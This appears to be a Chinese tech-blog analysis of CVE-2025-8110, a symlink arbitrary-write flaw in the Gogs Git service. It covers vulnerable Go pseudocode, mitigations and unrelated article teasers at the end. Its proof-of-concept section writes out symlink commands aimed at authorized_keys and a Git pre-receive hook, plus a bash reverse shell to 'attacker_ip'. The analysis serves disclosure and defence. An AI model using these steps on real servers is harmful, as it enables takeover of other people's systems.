news 2026/5/5 17:05:11

穿透版本控制的防线:Gogs 符号连接致远程代码执行漏洞 (CVE-2025-8110) 深度剖析

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
穿透版本控制的防线:Gogs 符号连接致远程代码执行漏洞 (CVE-2025-8110) 深度剖析

发布时间:2025年2月涉及组件:Gogs (Go Git Service)漏洞类型:任意文件写入 / 远程代码执行 (RCE)危害等级严重 (Critical)

1. 漏洞概述

Gogs 是一款极受欢迎的、自托管的轻量级 Git 服务,使用 Go 语言编写。由于其部署简单、资源占用低,被广泛应用于中小型企业及个人开发者团队中。

CVE-2025-8110揭示了 Gogs 在处理 Git 仓库文件操作(特别是文件上传和在线编辑功能)时存在严重逻辑缺陷。攻击者可以通过构造包含恶意**符号连接(Symbolic Link)**的仓库,欺骗 Gogs 服务器将文件内容写入到仓库目录之外的任意位置。通过覆盖系统关键文件(如 SSH 密钥文件)或 Git 钩子(Hooks),攻击者可直接获取服务器的 Shell 权限,实现 RCE。

2. 技术背景:符号连接与 Git

在深入漏洞之前,我们需要理解两个核心概念:

  1. 符号连接 (Symlink): 在 Linux/Unix 文件系统中,符号连接是一个指向另一个文件或目录的特殊文件(类似于 Windows 的快捷方式)。如果程序在读写文件时没有检查该文件是否为软连接,它可能会无意中操作软连接指向的目标文件,而不是软连接本身。

  2. Git 的文件模式: Git 能够存储文件的权限和类型信息。符号连接在 Git 对象数据库中以特殊的 blob 形式存储,其内容是目标路径,文件模式通常标记为120000

3. 漏洞原理分析

漏洞的核心在于 Gogs 的 Web 界面提供的**“文件上传”“在线编辑”**功能与底层文件系统操作之间的脱节。

3.1 攻击路径

攻击流程利用了 Gogs 在处理用户通过 Web UI 更新文件时的逻辑漏洞:

  1. 阶段一:埋雷攻击者在本地创建一个 Git 仓库,并创建一个指向服务器敏感路径的符号连接。 例如,创建一个名为exploit_link的软连接,指向/home/git/.ssh/authorized_keys(如果是 SSH 攻击)或者指向仓库自身的hooks/pre-receive(如果是 Hook RCE 攻击)。 攻击者将这个包含软连接的仓库推送到 Gogs 服务器。此时,服务器上只是存储了这个软连接文件,尚未造成危害。

  2. 阶段二:引爆攻击者登录 Gogs 的 Web 界面,进入该仓库,找到exploit_link文件。正常情况下,Web 界面应该显示这是一个链接,或者禁止编辑。 然而,漏洞在于 Gogs 的处理逻辑(通常位于routers/repo/file.go或类似的文件处理模块)在接收用户“更新文件”或“上传同名文件”的请求时:

    • 没有充分验证目标路径是否解析到了仓库外部。

    • 没有使用Lstat检查目标是否为符号连接,而是直接使用了类似os.OpenFileioutil.WriteFile的操作。

  3. 阶段三:越界写入当服务器执行写入操作时,操作系统会自动跟随exploit_link指向的路径。于是,攻击者上传的恶意内容(如一个新的 SSH 公钥或 Shell 脚本)并没有覆盖exploit_link本身,而是覆盖了/home/git/.ssh/authorized_keys

3.2 代码逻辑缺陷 (伪代码示例)

易受攻击的代码逻辑通常如下所示:

Go

// 假设这是处理文件更新的逻辑 func UpdateFile(repoPath string, fileName string, content []byte) error { // 拼接完整路径 fullPath := filepath.Join(repoPath, fileName) // 漏洞点:直接打开文件进行写入,未检查 fullPath 是否是一个 Symlink // 如果 fullPath 是一个指向 /etc/passwd 的软连接,这里就会写入 /etc/passwd f, err := os.OpenFile(fullPath, os.O_RDWR|os.O_TRUNC, 0666) if err != nil { return err } defer f.Close() _, err = f.Write(content) return err }

在修复后的版本中,开发者通常会加入filepath.EvalSymlinks来检查最终路径是否溢出了允许的根目录(Repo Root)。

4. 漏洞复现与利用场景 (PoC 思路)

场景 A:覆盖 SSH 公钥 (获取 Shell)

这是最直接的提权方式,前提是 Gogs 使用系统 SSH 服务运行。

  1. 构造软连接

    Bash
    ln -s /home/git/.ssh/authorized_keys my_key_link git add my_key_link git commit -m "Add symlink" git push
  2. Web 端操作: 在 Gogs 网页端打开my_key_link,点击“编辑”。

  3. 写入 Payload: 将内容替换为攻击者的 SSH 公钥 (ssh-rsa AAAAB3NzaC...)。

  4. 保存: 保存更改。此时服务器的authorized_keys被覆盖。

  5. 登录ssh git@target-server,直接获得服务器权限。

场景 B:劫持 Git Hooks (RCE)

如果无法覆盖 SSH 密钥(例如权限限制),攻击者可以利用 Git 的钩子机制。

  1. 构造软连接: 指向当前仓库的 hooks 目录(通常位于repo.git/hooks)。

    Bash
    ln -s .git/hooks/pre-receive exploit_hook git add exploit_hook git push

    注意:目标路径需要根据 Gogs 在服务器上的存储结构进行猜测或推断。

  2. Web 端操作: 编辑exploit_hook文件。

  3. 写入 Payload: 写入 Shell 脚本,例如反弹 Shell:

    Bash
    #!/bin/sh bash -i >& /dev/tcp/attacker_ip/4444 0>&1
  4. 触发 RCE: 在本地再次执行git push操作。服务器在处理 push 请求时会触发pre-receive钩子,从而执行恶意脚本。

5. 危害与影响

  • 完全系统接管:攻击者以运行 Gogs 进程的用户身份(通常是gitroot)执行任意代码。

  • 数据泄露:攻击者可以读取服务器上的配置文件(如app.ini),获取数据库密码等敏感信息。

  • 横向移动:利用获取的 Shell 权限攻击内网其他服务。

6. 修复方案

6.1 官方补丁

请立即升级 Gogs 到修复了 CVE-2025-8110 的最新版本。官方修复通常包含对文件写入操作前的Lstat检查,确保不会跟随符号连接,或者强制在写入前删除原文件。

6.2 临时缓解措施

如果无法立即升级,建议采取以下措施:

  1. 禁用在线编辑与上传: 在custom/conf/app.ini配置文件中,禁用 Web 编辑器和文件上传功能,切断攻击入口。

  2. 使用 Docker 隔离: 确保 Gogs 运行在 Docker 容器中,且不要将宿主机的敏感目录(如/root/.ssh)直接挂载进容器。这可以将危害限制在容器内部。

  3. 权限控制: 确保运行 Gogs 的系统用户权限最小化,无法写入/etc或其他关键系统目录。

7. 总结

CVE-2025-8110 再次提醒我们,在处理文件系统操作时,**“不要信任用户输入”**不仅仅指文本内容,也包括文件结构本身。对于任何允许用户上传或修改文件的 Web 应用,必须严格校验文件类型(是否为 Symlink)以及目标路径的规范性,防止目录穿越攻击。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/3 13:34:03

Spring Boot快速集成MiniMax、CosyVoice实现文本转语音

在一些需要高质量文本转语音(TTS)的场景中(比如:有声书配音、播客等)。之前介绍的EdgeTTS方案可能效果没有那么好。此时就比较推荐使用 MiniMax、CosyVoice这些提供的音色,这些音色的效果会更加拟人、逼真&…

作者头像 李华
网站建设 2026/4/26 6:59:40

逆向提示法:让大模型输出从平庸到专业的5步技巧

文章介绍"逆向提示"技巧,通过提供满意样例让模型反推提示词配方,解决AI内容同质化问题。该方法提炼语气、节奏、结构等要素,形成可复用模板,显著提升内容质量与一致性。作者提供社媒文案、产品描述等多场景应用案例&…

作者头像 李华
网站建设 2026/5/5 1:55:02

算法分析--基数排序

时间复杂度 O(KN)线性高位优先(不好)先按照高位升序排序,依次进行下去,直到排到最低位。image因为高位有一个分组的动作,在每个组里面对低位再排序。可以用递归。实际上,完全可以用低…

作者头像 李华
网站建设 2026/5/1 9:53:46

UVa 10641 Barisal Stadium

题目描述 孟加拉板球控制委员会决定在巴里萨尔建造一座新的国际板球场。该体育场形状为凸多边形,需要在外部安装泛光灯以便在灯光下比赛。每个泛光灯可以照亮体育场的某些边,建造每个灯需要一定成本。 照亮条件 :一条边被某个灯照亮&#xff…

作者头像 李华
网站建设 2026/5/5 19:03:47

AgentScope深入分析-设计模式与架构决策分分析

设计的精髓:设计模式与架构决策分析 摘要 AgentScope 的设计体现了深厚的工程智慧。本文将深入分析框架中使用的设计模式、架构决策,以及这些设计背后的考量。你会发现,框架大量使用了模板方法模式、策略模式、观察者模式、元类模式等经典设计…

作者头像 李华
网站建设 2026/5/3 6:25:42

MySQL的这6大雷区,大部分人都会踩中!

苏三的工作内推群为什么MySQL雷区如此之多?在深入具体雷区之前,我们先聊聊为什么MySQL这么容易踩坑。这背后有几个深层次原因:看似简单:MySQL语法简单,入门容易,让很多人低估了它的复杂性默认配置坑多&…

作者头像 李华